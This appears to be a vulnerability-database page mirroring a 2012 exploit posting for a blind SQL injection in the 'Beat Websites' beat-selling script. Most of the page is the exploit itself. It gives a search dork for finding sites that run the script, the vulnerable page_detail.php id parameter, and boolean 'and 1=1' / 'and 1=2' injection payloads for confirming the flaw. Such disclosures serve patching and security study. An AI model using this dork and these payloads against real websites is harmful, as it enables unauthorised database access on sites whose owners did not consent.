Beat Websites Blind SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1046059 漏洞类型
发布时间 2012-11-23 更新时间 2012-11-23
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012110169
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
########
.:. Author : Metropolis
.:. Home : www.metropolis.fr.cr 
.:. Script : Beat Websites
.:. Version : 1.0
.:. Download Script: http://beatwebsites.com/
.:.
.:. Information Script:
.:. You to Can Make Money Running Your Own Beat Website and Keep 100% of Your Profits!
.:. Take full control of your beat sales online and sell more beats on the Internet with your own Beat Website.
.:. Increase your visibility and brand yourself
.:. Very affordable solution for selling beats online
.:. Sell beats easily and quickly with simplified process
.:.
.:. Bug Type : Blind Sql Injection
.:. Discovered : 23/11/2012
.:. Dork : Powered by: Beat Websites

########
 
===[ Blind Sql Injection ]===
 
SQL Error =>
 
/page_detail.php?id=1' [Blind]

www.site.com//page_detail.php?id=1 and 1=1 <-- true

www.site.com//page_detail.php?id=1 and 1=2 <-- false
 

########